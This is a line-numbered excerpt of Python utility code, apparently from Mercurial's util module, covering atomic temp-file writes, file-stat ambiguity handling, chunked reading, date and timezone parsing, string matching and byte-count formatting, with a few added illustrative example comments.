1655 1655 # to exactly detect change of a file regardless of platform
1656 1656 return (self.stat.st_size == old.stat.st_size and
1657 1657 self.stat.st_ctime == old.stat.st_ctime and
1658 1658 self.stat.st_mtime == old.stat.st_mtime)
1659 1659 except AttributeError:
1660 1660 pass
1661 1661 try:
1662 1662 return self.stat is None and old.stat is None
1663 1663 except AttributeError:
1664 1664 return False
1665 1665
1666 1666 def isambig(self, old):
1667 1667 """Examine whether new (= self) stat is ambiguous against old one
1668 1668
1669 1669 "S[N]" below means stat of a file at N-th change:
1670 1670
1671 1671 - S[n-1].ctime < S[n].ctime: can detect change of a file
1672 1672 - S[n-1].ctime == S[n].ctime
1673 1673 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1674 1674 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1675 1675 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1676 1676 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1677 1677
1678 1678 Case (*2) above means that a file was changed twice or more within
1679 1679 the same second (= S[n-1].ctime), and comparison of timestamps
1680 1680 is ambiguous.
1681 1681
1682 1682 The basic idea to avoid such ambiguity is to "advance mtime by 1 sec,
1683 1683 if the timestamp is ambiguous".
1684 1684
1685 1685 But advancing mtime only in case (*2) doesn't work as
1686 1686 expected, because naturally advanced S[n].mtime in case (*1)
1687 1687 might be equal to manually advanced S[n-1 or earlier].mtime.
1688 1688
1689 1689 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1690 1690 treated as ambiguous regardless of mtime, to avoid overlooking
1691 1691 changes hidden by collisions between such mtimes.
1692 1692
1693 1693 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1694 1694 S[n].mtime", even if size of a file isn't changed.
1695 1695 """
1696 1696 try:
1697 1697 return (self.stat.st_ctime == old.stat.st_ctime)
1698 1698 except AttributeError:
1699 1699 return False
1700 1700
1701 1701 def avoidambig(self, path, old):
1702 1702 """Change file stat of specified path to avoid ambiguity
1703 1703
1704 1704 'old' should be previous filestat of 'path'.
1705 1705
1706 1706 This skips avoiding ambiguity, if a process doesn't have
1707 1707 appropriate privileges for 'path'. This returns False in this
1708 1708 case.
1709 1709
1710 1710 Otherwise, this returns True, as "ambiguity is avoided".
1711 1711 """
1712 1712 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1713 1713 try:
1714 1714 os.utime(path, (advanced, advanced))
1715 1715 except OSError as inst:
1716 1716 if inst.errno == errno.EPERM:
1717 1717 # utime() on the file created by another user causes EPERM,
1718 1718 # if a process doesn't have appropriate privileges
1719 1719 return False
1720 1720 raise
1721 1721 return True
1722 1722
1723 1723 def __ne__(self, other):
1724 1724 return not self == other
1725 1725
1726 1726 class atomictempfile(object):
1727 1727 '''writable file object that atomically updates a file
1728 1728
1729 1729 All writes will go to a temporary copy of the original file. Call
1730 1730 close() when you are done writing, and atomictempfile will rename
1731 1731 the temporary copy to the original name, making the changes
1732 1732 visible. If the object is destroyed without being closed, all your
1733 1733 writes are discarded.
1734 1734
1735 1735 checkambig argument of constructor is used with filestat, and is
1736 1736 useful only if target file is guarded by any lock (e.g. repo.lock
1737 1737 or repo.wlock).
1738 1738 '''
1739 1739 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1740 1740 self.__name = name # permanent name
1741 1741 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1742 1742 createmode=createmode)
1743 1743 self._fp = posixfile(self._tempname, mode)
1744 1744 self._checkambig = checkambig
1745 1745
1746 1746 # delegated methods
1747 1747 self.read = self._fp.read
1748 1748 self.write = self._fp.write
1749 1749 self.seek = self._fp.seek
1750 1750 self.tell = self._fp.tell
1751 1751 self.fileno = self._fp.fileno
1752 1752
1753 1753 def close(self):
1754 1754 if not self._fp.closed:
1755 1755 self._fp.close()
1756 1756 filename = localpath(self.__name)
1757 1757 oldstat = self._checkambig and filestat.frompath(filename)
1758 1758 if oldstat and oldstat.stat:
1759 1759 rename(self._tempname, filename)
1760 1760 newstat = filestat.frompath(filename)
1761 1761 if newstat.isambig(oldstat):
1762 1762 # stat of changed file is ambiguous to original one
1763 1763 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1764 1764 os.utime(filename, (advanced, advanced))
1765 1765 else:
1766 1766 rename(self._tempname, filename)
1767 1767
1768 1768 def discard(self):
1769 1769 if not self._fp.closed:
1770 1770 try:
1771 1771 os.unlink(self._tempname)
1772 1772 except OSError:
1773 1773 pass
1774 1774 self._fp.close()
1775 1775
1776 1776 def __del__(self):
1777 1777 if safehasattr(self, '_fp'): # constructor actually did something
1778 1778 self.discard()
1779 1779
1780 1780 def __enter__(self):
1781 1781 return self
1782 1782
1783 1783 def __exit__(self, exctype, excvalue, traceback):
1784 1784 if exctype is not None:
1785 1785 self.discard()
1786 1786 else:
1787 1787 self.close()
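
# Illustrative sketch (assumed example, not part of the original module; the
# path is hypothetical): all writes go to a temporary copy and only become
# visible when the context exits cleanly; an exception discards them.
#
#   with atomictempfile(b'.hg/requires', 'wb') as fp:
#       fp.write(b'new content\n')
#   # '.hg/requires' is now replaced atomically via rename()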
1788 1788
1789 1789 def unlinkpath(f, ignoremissing=False):
1790 1790 """unlink and remove the directory if it is empty"""
1791 1791 if ignoremissing:
1792 1792 tryunlink(f)
1793 1793 else:
1794 1794 unlink(f)
1795 1795 # try removing directories that might now be empty
1796 1796 try:
1797 1797 removedirs(os.path.dirname(f))
1798 1798 except OSError:
1799 1799 pass
1800 1800
1801 1801 def tryunlink(f):
1802 1802 """Attempt to remove a file, ignoring ENOENT errors."""
1803 1803 try:
1804 1804 unlink(f)
1805 1805 except OSError as e:
1806 1806 if e.errno != errno.ENOENT:
1807 1807 raise
1808 1808
1809 1809 def makedirs(name, mode=None, notindexed=False):
1810 1810 """recursive directory creation with parent mode inheritance
1811 1811
1812 1812 Newly created directories are marked as "not to be indexed by
1813 1813 the content indexing service", if ``notindexed`` is specified
1814 1814 for "write" mode access.
1815 1815 """
1816 1816 try:
1817 1817 makedir(name, notindexed)
1818 1818 except OSError as err:
1819 1819 if err.errno == errno.EEXIST:
1820 1820 return
1821 1821 if err.errno != errno.ENOENT or not name:
1822 1822 raise
1823 1823 parent = os.path.dirname(os.path.abspath(name))
1824 1824 if parent == name:
1825 1825 raise
1826 1826 makedirs(parent, mode, notindexed)
1827 1827 try:
1828 1828 makedir(name, notindexed)
1829 1829 except OSError as err:
1830 1830 # Catch EEXIST to handle races
1831 1831 if err.errno == errno.EEXIST:
1832 1832 return
1833 1833 raise
1834 1834 if mode is not None:
1835 1835 os.chmod(name, mode)
1836 1836
1837 1837 def readfile(path):
1838 1838 with open(path, 'rb') as fp:
1839 1839 return fp.read()
1840 1840
1841 1841 def writefile(path, text):
1842 1842 with open(path, 'wb') as fp:
1843 1843 fp.write(text)
1844 1844
1845 1845 def appendfile(path, text):
1846 1846 with open(path, 'ab') as fp:
1847 1847 fp.write(text)
1848 1848
1849 1849 class chunkbuffer(object):
1850 1850 """Allow arbitrary sized chunks of data to be efficiently read from an
1851 1851 iterator over chunks of arbitrary size."""
1852 1852
1853 1853 def __init__(self, in_iter):
1854 1854 """in_iter is the iterator that's iterating over the input chunks."""
1855 1855 def splitbig(chunks):
1856 1856 for chunk in chunks:
1857 1857 if len(chunk) > 2**20:
1858 1858 pos = 0
1859 1859 while pos < len(chunk):
1860 1860 end = pos + 2 ** 18
1861 1861 yield chunk[pos:end]
1862 1862 pos = end
1863 1863 else:
1864 1864 yield chunk
1865 1865 self.iter = splitbig(in_iter)
1866 1866 self._queue = collections.deque()
1867 1867 self._chunkoffset = 0
1868 1868
1869 1869 def read(self, l=None):
1870 1870 """Read L bytes of data from the iterator of chunks of data.
1871 1871 Returns less than L bytes if the iterator runs dry.
1872 1872
1873 1873 If the size parameter is omitted, read everything"""
1874 1874 if l is None:
1875 1875 return ''.join(self.iter)
1876 1876
1877 1877 left = l
1878 1878 buf = []
1879 1879 queue = self._queue
1880 1880 while left > 0:
1881 1881 # refill the queue
1882 1882 if not queue:
1883 1883 target = 2**18
1884 1884 for chunk in self.iter:
1885 1885 queue.append(chunk)
1886 1886 target -= len(chunk)
1887 1887 if target <= 0:
1888 1888 break
1889 1889 if not queue:
1890 1890 break
1891 1891
1892 1892 # The easy way to do this would be to queue.popleft(), modify the
1893 1893 # chunk (if necessary), then queue.appendleft(). However, for cases
1894 1894 # where we read partial chunk content, this incurs 2 dequeue
1895 1895 # mutations and creates a new str for the remaining chunk in the
1896 1896 # queue. Our code below avoids this overhead.
1897 1897
1898 1898 chunk = queue[0]
1899 1899 chunkl = len(chunk)
1900 1900 offset = self._chunkoffset
1901 1901
1902 1902 # Use full chunk.
1903 1903 if offset == 0 and left >= chunkl:
1904 1904 left -= chunkl
1905 1905 queue.popleft()
1906 1906 buf.append(chunk)
1907 1907 # self._chunkoffset remains at 0.
1908 1908 continue
1909 1909
1910 1910 chunkremaining = chunkl - offset
1911 1911
1912 1912 # Use all of unconsumed part of chunk.
1913 1913 if left >= chunkremaining:
1914 1914 left -= chunkremaining
1915 1915 queue.popleft()
1916 1916 # offset == 0 is enabled by block above, so this won't merely
1917 1917 # copy via ``chunk[0:]``.
1918 1918 buf.append(chunk[offset:])
1919 1919 self._chunkoffset = 0
1920 1920
1921 1921 # Partial chunk needed.
1922 1922 else:
1923 1923 buf.append(chunk[offset:offset + left])
1924 1924 self._chunkoffset += left
1925 1925 left -= chunkremaining
1926 1926
1927 1927 return ''.join(buf)
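
# Doctest-style sketch (illustrative only, not part of the original module):
# callers can read arbitrary byte counts from an iterator of unevenly sized
# chunks.
#
#   >>> buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
#   >>> buf.read(5)
#   'abcde'
#   >>> buf.read(10)   # returns what is left when the iterator runs dry
#   'fgh'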
1928 1928
1929 1929 def filechunkiter(f, size=131072, limit=None):
1930 1930 """Create a generator that produces the data in the file, size
1931 1931 (default 131072) bytes at a time, up to an optional limit (default is
1932 1932 to read all data). Chunks may be less than size bytes if the
1933 1933 chunk is the last chunk in the file, or the file is a socket or
1934 1934 some other type of file that sometimes reads less data than is
1935 1935 requested."""
1936 1936 assert size >= 0
1937 1937 assert limit is None or limit >= 0
1938 1938 while True:
1939 1939 if limit is None:
1940 1940 nbytes = size
1941 1941 else:
1942 1942 nbytes = min(limit, size)
1943 1943 s = nbytes and f.read(nbytes)
1944 1944 if not s:
1945 1945 break
1946 1946 if limit:
1947 1947 limit -= len(s)
1948 1948 yield s
1949 1949
1950 1950 def makedate(timestamp=None):
1951 1951 '''Return a unix timestamp (or the current time) as a (unixtime,
1952 1952 offset) tuple based off the local timezone.'''
1953 1953 if timestamp is None:
1954 1954 timestamp = time.time()
1955 1955 if timestamp < 0:
1956 1956 hint = _("check your clock")
1957 1957 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1958 1958 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1959 1959 datetime.datetime.fromtimestamp(timestamp))
1960 1960 tz = delta.days * 86400 + delta.seconds
1961 1961 return timestamp, tz
1962 1962
1963 1963 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1964 1964 """represent a (unixtime, offset) tuple as a localized time.
1965 1965 unixtime is seconds since the epoch, and offset is the time zone's
1966 1966 number of seconds away from UTC.
1967 1967
1968 1968 >>> datestr((0, 0))
1969 1969 'Thu Jan 01 00:00:00 1970 +0000'
1970 1970 >>> datestr((42, 0))
1971 1971 'Thu Jan 01 00:00:42 1970 +0000'
1972 1972 >>> datestr((-42, 0))
1973 1973 'Wed Dec 31 23:59:18 1969 +0000'
1974 1974 >>> datestr((0x7fffffff, 0))
1975 1975 'Tue Jan 19 03:14:07 2038 +0000'
1976 1976 >>> datestr((-0x80000000, 0))
1977 1977 'Fri Dec 13 20:45:52 1901 +0000'
1978 1978 """
1979 1979 t, tz = date or makedate()
1980 1980 if "%1" in format or "%2" in format or "%z" in format:
1981 1981 sign = (tz > 0) and "-" or "+"
1982 1982 minutes = abs(tz) // 60
1983 1983 q, r = divmod(minutes, 60)
1984 1984 format = format.replace("%z", "%1%2")
1985 1985 format = format.replace("%1", "%c%02d" % (sign, q))
1986 1986 format = format.replace("%2", "%02d" % r)
1987 1987 d = t - tz
1988 1988 if d > 0x7fffffff:
1989 1989 d = 0x7fffffff
1990 1990 elif d < -0x80000000:
1991 1991 d = -0x80000000
1992 1992 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1993 1993 # because they use the gmtime() system call which is buggy on Windows
1994 1994 # for negative values.
1995 1995 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1996 1996 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1997 1997 return s
1998 1998
1999 1999 def shortdate(date=None):
2000 2000 """turn a (timestamp, tzoff) tuple into an iso 8601 date."""
2001 2001 return datestr(date, format='%Y-%m-%d')
2002 2002
2003 2003 def parsetimezone(s):
2004 2004 """find a trailing timezone, if any, in string, and return a
2005 2005 (offset, remainder) pair"""
2006 2006
2007 2007 if s.endswith("GMT") or s.endswith("UTC"):
2008 2008 return 0, s[:-3].rstrip()
2009 2009
2010 2010 # Unix-style timezones [+-]hhmm
2011 2011 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2012 2012 sign = (s[-5] == "+") and 1 or -1
2013 2013 hours = int(s[-4:-2])
2014 2014 minutes = int(s[-2:])
2015 2015 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2016 2016
2017 2017 # ISO8601 trailing Z
2018 2018 if s.endswith("Z") and s[-2:-1].isdigit():
2019 2019 return 0, s[:-1]
2020 2020
2021 2021 # ISO8601-style [+-]hh:mm
2022 2022 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2023 2023 s[-5:-3].isdigit() and s[-2:].isdigit()):
2024 2024 sign = (s[-6] == "+") and 1 or -1
2025 2025 hours = int(s[-5:-3])
2026 2026 minutes = int(s[-2:])
2027 2027 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2028 2028
2029 2029 return None, s
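
# Doctest-style sketch (illustrative only, not part of the original module):
#
#   >>> parsetimezone(b'2006-02-06 13:00:30 -0500')
#   (18000, '2006-02-06 13:00:30')
#   >>> parsetimezone(b'2006-02-06 13:00:30 GMT')
#   (0, '2006-02-06 13:00:30')
#   >>> parsetimezone(b'2006-02-06 13:00:30')
#   (None, '2006-02-06 13:00:30')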
2030 2030
2031 2031 def strdate(string, format, defaults=None):
2032 2032 """parse a localized time string and return a (unixtime, offset) tuple.
2033 2033 if the string cannot be parsed, ValueError is raised."""
2034 2034 if defaults is None:
2035 2035 defaults = {}
2036 2036
2037 2037 # NOTE: unixtime = localunixtime + offset
2038 2038 offset, date = parsetimezone(string)
2039 2039
2040 2040 # add missing elements from defaults
2041 2041 usenow = False # default to using biased defaults
2042 2042 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2043 2043 part = pycompat.bytestr(part)
2044 2044 found = [True for p in part if ("%"+p) in format]
2045 2045 if not found:
2046 2046 date += "@" + defaults[part][usenow]
2047 2047 format += "@%" + part[0]
2048 2048 else:
2049 2049 # We've found a specific time element, less specific time
2050 2050 # elements are relative to today
2051 2051 usenow = True
2052 2052
2053 2053 timetuple = time.strptime(encoding.strfromlocal(date),
2054 2054 encoding.strfromlocal(format))
2055 2055 localunixtime = int(calendar.timegm(timetuple))
2056 2056 if offset is None:
2057 2057 # local timezone
2058 2058 unixtime = int(time.mktime(timetuple))
2059 2059 offset = unixtime - localunixtime
2060 2060 else:
2061 2061 unixtime = localunixtime + offset
2062 2062 return unixtime, offset
2063 2063
2064 2064 def parsedate(date, formats=None, bias=None):
2065 2065 """parse a localized date/time and return a (unixtime, offset) tuple.
2066 2066
2067 2067 The date may be a "unixtime offset" string or in one of the specified
2068 2068 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2069 2069
2070 2070 >>> parsedate(b' today ') == parsedate(
2071 2071 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2072 2072 True
2073 2073 >>> parsedate(b'yesterday ') == parsedate(
2074 2074 ... (datetime.date.today() - datetime.timedelta(days=1)
2075 2075 ... ).strftime('%b %d').encode('ascii'))
2076 2076 True
2077 2077 >>> now, tz = makedate()
2078 2078 >>> strnow, strtz = parsedate(b'now')
2079 2079 >>> (strnow - now) < 1
2080 2080 True
2081 2081 >>> tz == strtz
2082 2082 True
2083 2083 """
2084 2084 if bias is None:
2085 2085 bias = {}
2086 2086 if not date:
2087 2087 return 0, 0
2088 2088 if isinstance(date, tuple) and len(date) == 2:
2089 2089 return date
2090 2090 if not formats:
2091 2091 formats = defaultdateformats
2092 2092 date = date.strip()
2093 2093
2094 2094 if date == 'now' or date == _('now'):
2095 2095 return makedate()
2096 2096 if date == 'today' or date == _('today'):
2097 2097 date = datetime.date.today().strftime(r'%b %d')
2098 2098 date = encoding.strtolocal(date)
2099 2099 elif date == 'yesterday' or date == _('yesterday'):
2100 2100 date = (datetime.date.today() -
2101 2101 datetime.timedelta(days=1)).strftime(r'%b %d')
2102 2102 date = encoding.strtolocal(date)
2103 2103
2104 2104 try:
2105 2105 when, offset = map(int, date.split(' '))
2106 2106 except ValueError:
2107 2107 # fill out defaults
2108 2108 now = makedate()
2109 2109 defaults = {}
2110 2110 for part in ("d", "mb", "yY", "HI", "M", "S"):
2111 2111 # this piece is for rounding the specific end of unknowns
2112 2112 b = bias.get(part)
2113 2113 if b is None:
2114 2114 if part[0:1] in "HMS":
2115 2115 b = "00"
2116 2116 else:
2117 2117 b = "0"
2118 2118
2119 2119 # this piece is for matching the generic end to today's date
2120 2120 n = datestr(now, "%" + part[0:1])
2121 2121
2122 2122 defaults[part] = (b, n)
2123 2123
2124 2124 for format in formats:
2125 2125 try:
2126 2126 when, offset = strdate(date, format, defaults)
2127 2127 except (ValueError, OverflowError):
2128 2128 pass
2129 2129 else:
2130 2130 break
2131 2131 else:
2132 2132 raise error.ParseError(_('invalid date: %r') % date)
2133 2133 # validate explicit (probably user-specified) date and
2134 2134 # time zone offset. values must fit in signed 32 bits for
2135 2135 # current 32-bit linux runtimes. timezones go from UTC-12
2136 2136 # to UTC+14
2137 2137 if when < -0x80000000 or when > 0x7fffffff:
2138 2138 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2139 2139 if offset < -50400 or offset > 43200:
2140 2140 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2141 2141 return when, offset
2142 2142
2143 2143 def matchdate(date):
2144 2144 """Return a function that matches a given date match specifier
2145 2145
2146 2146 Formats include:
2147 2147
2148 2148 '{date}' match a given date to the accuracy provided
2149 2149
2150 2150 '<{date}' on or before a given date
2151 2151
2152 2152 '>{date}' on or after a given date
2153 2153
2154 2154 >>> p1 = parsedate(b"10:29:59")
2155 2155 >>> p2 = parsedate(b"10:30:00")
2156 2156 >>> p3 = parsedate(b"10:30:59")
2157 2157 >>> p4 = parsedate(b"10:31:00")
2158 2158 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2159 2159 >>> f = matchdate(b"10:30")
2160 2160 >>> f(p1[0])
2161 2161 False
2162 2162 >>> f(p2[0])
2163 2163 True
2164 2164 >>> f(p3[0])
2165 2165 True
2166 2166 >>> f(p4[0])
2167 2167 False
2168 2168 >>> f(p5[0])
2169 2169 False
2170 2170 """
2171 2171
2172 2172 def lower(date):
2173 2173 d = {'mb': "1", 'd': "1"}
2174 2174 return parsedate(date, extendeddateformats, d)[0]
2175 2175
2176 2176 def upper(date):
2177 2177 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2178 2178 for days in ("31", "30", "29"):
2179 2179 try:
2180 2180 d["d"] = days
2181 2181 return parsedate(date, extendeddateformats, d)[0]
2182 2182 except Abort:
2183 2183 pass
2184 2184 d["d"] = "28"
2185 2185 return parsedate(date, extendeddateformats, d)[0]
2186 2186
2187 2187 date = date.strip()
2188 2188
2189 2189 if not date:
2190 2190 raise Abort(_("dates cannot consist entirely of whitespace"))
2191 2191 elif date[0] == "<":
2192 2192 if not date[1:]:
2193 2193 raise Abort(_("invalid day spec, use '<DATE'"))
2194 2194 when = upper(date[1:])
2195 2195 return lambda x: x <= when
2196 2196 elif date[0] == ">":
2197 2197 if not date[1:]:
2198 2198 raise Abort(_("invalid day spec, use '>DATE'"))
2199 2199 when = lower(date[1:])
2200 2200 return lambda x: x >= when
2201 2201 elif date[0] == "-":
2202 2202 try:
2203 2203 days = int(date[1:])
2204 2204 except ValueError:
2205 2205 raise Abort(_("invalid day spec: %s") % date[1:])
2206 2206 if days < 0:
2207 2207 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2208 2208 % date[1:])
2209 2209 when = makedate()[0] - days * 3600 * 24
2210 2210 return lambda x: x >= when
2211 2211 elif " to " in date:
2212 2212 a, b = date.split(" to ")
2213 2213 start, stop = lower(a), upper(b)
2214 2214 return lambda x: x >= start and x <= stop
2215 2215 else:
2216 2216 start, stop = lower(date), upper(date)
2217 2217 return lambda x: x >= start and x <= stop
2218 2218
2219 2219 def stringmatcher(pattern, casesensitive=True):
2220 2220 """
2221 2221 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2222 2222 returns the matcher name, pattern, and matcher function.
2223 2223 missing or unknown prefixes are treated as literal matches.
2224 2224
2225 2225 helper for tests:
2226 2226 >>> def test(pattern, *tests):
2227 2227 ... kind, pattern, matcher = stringmatcher(pattern)
2228 2228 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2229 2229 >>> def itest(pattern, *tests):
2230 2230 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2231 2231 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2232 2232
2233 2233 exact matching (no prefix):
2234 2234 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2235 2235 ('literal', 'abcdefg', [False, False, True])
2236 2236
2237 2237 regex matching ('re:' prefix)
2238 2238 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2239 2239 ('re', 'a.+b', [False, False, True])
2240 2240
2241 2241 force exact matches ('literal:' prefix)
2242 2242 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2243 2243 ('literal', 're:foobar', [False, True])
2244 2244
2245 2245 unknown prefixes are ignored and treated as literals
2246 2246 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2247 2247 ('literal', 'foo:bar', [False, False, True])
2248 2248
2249 2249 case insensitive regex matches
2250 2250 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2251 2251 ('re', 'A.+b', [False, False, True])
2252 2252
2253 2253 case insensitive literal matches
2254 2254 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2255 2255 ('literal', 'ABCDEFG', [False, False, True])
2256 2256 """
2257 2257 if pattern.startswith('re:'):
2258 2258 pattern = pattern[3:]
2259 2259 try:
2260 2260 flags = 0
2261 2261 if not casesensitive:
2262 2262 flags = remod.I
2263 2263 regex = remod.compile(pattern, flags)
2264 2264 except remod.error as e:
2265 2265 raise error.ParseError(_('invalid regular expression: %s')
2266 2266 % e)
2267 2267 return 're', pattern, regex.search
2268 2268 elif pattern.startswith('literal:'):
2269 2269 pattern = pattern[8:]
2270 2270
2271 2271 match = pattern.__eq__
2272 2272
2273 2273 if not casesensitive:
2274 2274 ipat = encoding.lower(pattern)
2275 2275 match = lambda s: ipat == encoding.lower(s)
2276 2276 return 'literal', pattern, match
2277 2277
2278 2278 def shortuser(user):
2279 2279 """Return a short representation of a user name or email address."""
2280 2280 f = user.find('@')
2281 2281 if f >= 0:
2282 2282 user = user[:f]
2283 2283 f = user.find('<')
2284 2284 if f >= 0:
2285 2285 user = user[f + 1:]
2286 2286 f = user.find(' ')
2287 2287 if f >= 0:
2288 2288 user = user[:f]
2289 2289 f = user.find('.')
2290 2290 if f >= 0:
2291 2291 user = user[:f]
2292 2292 return user
2293 2293
2294 2294 def emailuser(user):
2295 2295 """Return the user portion of an email address."""
2296 2296 f = user.find('@')
2297 2297 if f >= 0:
2298 2298 user = user[:f]
2299 2299 f = user.find('<')
2300 2300 if f >= 0:
2301 2301 user = user[f + 1:]
2302 2302 return user
2303 2303
2304 2304 def email(author):
2305 2305 '''get email of author.'''
2306 2306 r = author.find('>')
2307 2307 if r == -1:
2308 2308 r = None
2309 2309 return author[author.find('<') + 1:r]
2310 2310
2311 2311 def ellipsis(text, maxlength=400):
2312 2312 """Trim string to at most maxlength (default: 400) columns in display."""
2313 2313 return encoding.trim(text, maxlength, ellipsis='...')
2314 2314
2315 2315 def unitcountfn(*unittable):
2316 2316 '''return a function that renders a readable count of some quantity'''
2317 2317
2318 2318 def go(count):
2319 2319 for multiplier, divisor, format in unittable:
2320 2320 if abs(count) >= divisor * multiplier:
2321 2321 return format % (count / float(divisor))
2322 2322 return unittable[-1][2] % count
2323 2323
2324 2324 return go
2325 2325
2326 2326 def processlinerange(fromline, toline):
2327 2327 """Check that linerange <fromline>:<toline> makes sense and return a
2328 2328 0-based range.
2329 2329
2330 2330 >>> processlinerange(10, 20)
2331 2331 (9, 20)
2332 2332 >>> processlinerange(2, 1)
2333 2333 Traceback (most recent call last):
2334 2334 ...
2335 2335 ParseError: line range must be positive
2336 2336 >>> processlinerange(0, 5)
2337 2337 Traceback (most recent call last):
2338 2338 ...
2339 2339 ParseError: fromline must be strictly positive
2340 2340 """
2341 2341 if toline - fromline < 0:
2342 2342 raise error.ParseError(_("line range must be positive"))
2343 2343 if fromline < 1:
2344 2344 raise error.ParseError(_("fromline must be strictly positive"))
2345 2345 return fromline - 1, toline
2346 2346
2347 2347 bytecount = unitcountfn(
2348 2348 (100, 1 << 30, _('%.0f GB')),
2349 2349 (10, 1 << 30, _('%.1f GB')),
2350 2350 (1, 1 << 30, _('%.2f GB')),
2351 2351 (100, 1 << 20, _('%.0f MB')),
2352 2352 (10, 1 << 20, _('%.1f MB')),
2353 2353 (1, 1 << 20, _('%.2f MB')),
2354 2354 (100, 1 << 10, _('%.0f KB')),
2355 2355 (10, 1 << 10, _('%.1f KB')),
2356 2356 (1, 1 << 10, _('%.2f KB')),
2357 2357 (1, 1, _('%.0f bytes')),
2358 2358 )
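A hedged, doctest-style illustration (assuming the util module namespace, as in the doctests above, and an untranslated locale): the first unittable row whose threshold (multiplier * divisor) the value reaches supplies the format string, and the last row is the fallback.

>>> bytecount(1234567)   # at least 1 MiB, so the '%.2f MB' row applies
'1.18 MB'
>>> bytecount(512)       # below every threshold, so '%.0f bytes' applies
'512 bytes'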
2359 2359
2360 2360 # Matches a single EOL which can either be a CRLF where repeated CR
2361 2361 # are removed or a LF. We do not care about old Macintosh files, so a
2362 2362 # stray CR is an error.
2363 2363 _eolre = remod.compile(br'\r*\n')
2364 2364
2365 2365 def tolf(s):
2366 2366 return _eolre.sub('\n', s)
2367 2367
2368 2368 def tocrlf(s):
2369 2369 return _eolre.sub('\r\n', s)
2370 2370
2371 2371 if pycompat.oslinesep == '\r\n':
2372 2372 tonativeeol = tocrlf
2373 2373 fromnativeeol = tolf
2374 2374 else:
2375 2375 tonativeeol = pycompat.identity
2376 2376 fromnativeeol = pycompat.identity
2377 2377
2378 2378 def escapestr(s):
2379 2379 # call underlying function of s.encode('string_escape') directly for
2380 2380 # Python 3 compatibility
2381 2381 return codecs.escape_encode(s)[0]
2382 2382
2383 2383 def unescapestr(s):
2384 2384 return codecs.escape_decode(s)[0]
2385 2385
2386 2386 def forcebytestr(obj):
2387 2387 """Portably format an arbitrary object (e.g. exception) into a byte
2388 2388 string."""
2389 2389 try:
2390 2390 return pycompat.bytestr(obj)
2391 2391 except UnicodeEncodeError:
2392 2392 # non-ascii string, may be lossy
2393 2393 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2394 2394
2395 2395 def uirepr(s):
2396 2396 # Avoid double backslash in Windows path repr()
2397 2397 return repr(s).replace('\\\\', '\\')
2398 2398
2399 2399 # delay import of textwrap
2400 2400 def MBTextWrapper(**kwargs):
2401 2401 class tw(textwrap.TextWrapper):
2402 2402 """
2403 2403 Extend TextWrapper for width-awareness.
2404 2404
2405 2405 Neither the number of 'bytes' in any encoding nor of 'characters' is
2406 2406 appropriate for calculating terminal columns for a given string.
2407 2407
2408 2408 The original TextWrapper implementation uses the built-in 'len()' directly,
2409 2409 so overriding is needed to use the width information of each character.
2410 2410
2411 2411 In addition, characters classified as 'ambiguous' width are
2412 2412 treated as wide in East Asian locales, but as narrow elsewhere.
2413 2413
2414 2414 This requires a user decision to determine the width of such characters.
2415 2415 """
2416 2416 def _cutdown(self, ucstr, space_left):
2417 2417 l = 0
2418 2418 colwidth = encoding.ucolwidth
2419 2419 for i in xrange(len(ucstr)):
2420 2420 l += colwidth(ucstr[i])
2421 2421 if space_left < l:
2422 2422 return (ucstr[:i], ucstr[i:])
2423 2423 return ucstr, ''
2424 2424
2425 2425 # overriding of base class
2426 2426 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2427 2427 space_left = max(width - cur_len, 1)
2428 2428
2429 2429 if self.break_long_words:
2430 2430 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2431 2431 cur_line.append(cut)
2432 2432 reversed_chunks[-1] = res
2433 2433 elif not cur_line:
2434 2434 cur_line.append(reversed_chunks.pop())
2435 2435
2436 2436 # this overriding code is imported from TextWrapper of Python 2.6
2437 2437 # to calculate columns of string by 'encoding.ucolwidth()'
2438 2438 def _wrap_chunks(self, chunks):
2439 2439 colwidth = encoding.ucolwidth
2440 2440
2441 2441 lines = []
2442 2442 if self.width <= 0:
2443 2443 raise ValueError("invalid width %r (must be > 0)" % self.width)
2444 2444
2445 2445 # Arrange in reverse order so items can be efficiently popped
2446 2446 # from a stack of chunks.
2447 2447 chunks.reverse()
2448 2448
